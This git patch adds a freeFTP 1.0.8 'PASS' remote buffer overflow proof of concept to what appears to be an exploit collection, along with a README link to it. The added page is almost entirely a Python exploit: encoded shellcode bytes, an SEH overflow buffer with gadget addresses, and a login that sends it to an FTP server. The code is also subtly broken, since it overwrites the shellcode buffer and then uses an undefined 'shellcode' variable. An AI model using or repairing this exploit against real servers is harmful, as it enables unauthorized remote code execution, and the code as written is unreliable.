From a673b4e7071da56537aaf8b7c43680147cb62174 Mon Sep 17 00:00:00 2001
From: mr-xn <mrxn.net@gmail.com>
Date: Mon, 28 Oct 2019 20:56:47 +0800
Subject: [PATCH] =?UTF-8?q?freeFTP1.0.8-PASS=E8=BF=9C=E7=A8=8B=E7=BC=93?=
 =?UTF-8?q?=E5=86=B2=E5=8C=BA=E6=BA=A2=E5=87=BA?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 README.md                            |  1 +
 freeFTP1.0.8-'PASS'远程缓冲区溢出.md | 69 ++++++++++++++++++++++++++++
 2 files changed, 70 insertions(+)
 create mode 100644 freeFTP1.0.8-'PASS'远程缓冲区溢出.md

diff --git a/README.md b/README.md
index 5082cbc..057fc2e 100644
--- a/README.md
+++ b/README.md
@@ -81,6 +81,7 @@
 - [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md)
 - [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md)
 - [ecologyExp.jar-泛微ecology OA系统数据库配置文件读取](./tools/ecologyExp.jar)
+- [freeFTP1.0.8-'PASS'远程缓冲区溢出](./freeFTP1.0.8-'PASS'远程缓冲区溢出.md)
 
 ## 提权辅助相关
 
diff --git a/freeFTP1.0.8-'PASS'远程缓冲区溢出.md b/freeFTP1.0.8-'PASS'远程缓冲区溢出.md
new file mode 100644
index 0000000..94de7e4
--- /dev/null
+++ b/freeFTP1.0.8-'PASS'远程缓冲区溢出.md
@@ -0,0 +1,69 @@
+## freeFTP1.0.8-'PASS'远程缓冲区溢出  
+
+## POC  
+
+```python
+# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
+# Date: 2019-09-01
+# Author: Chet Manly
+# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
+# Version: 1.0.8
+# CVE: N/A
+
+from ftplib import FTP
+
+buf =  ""
+buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
+buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
+buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
+buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
+buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36"
+buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32"
+buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f"
+buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62"
+buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57"
+buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31"
+buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72"
+buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44"
+buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f"
+buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70"
+buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73"
+buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78"
+buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30"
+buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b"
+buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66"
+buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a"
+buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e"
+buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71"
+buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66"
+buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f"
+buf += "\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52"
+buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55"
+buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b"
+buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42"
+buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55"
+buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58"
+buf += "\x45\x35\x53\x30\x41\x41"
+
+buf = 'A' * 276
+buf += '\x90' * 10
+buf += shellcode
+buf += 'B' * (486 - len(shellcode))
+buf += '\x58' # pop eax
+buf += '\xfe\xcc' # dec ah
+buf += '\xfe\xcc' # dec ah
+buf += '\xff\xe0' # jmp eax
+buf += 'C' * 4
+buf += '\xe8\xf0\xff\xff\xff' # call near
+buf += 'D' * 9
+buf += '\xeb\xf0\x90\x90' # jump backwards
+buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret
+buf += 'E' * (1000 - len(buf))
+ftp = FTP()
+ftp.connect('192.168.1.1', 21)
+ftp.login('anonymous', buf)
+```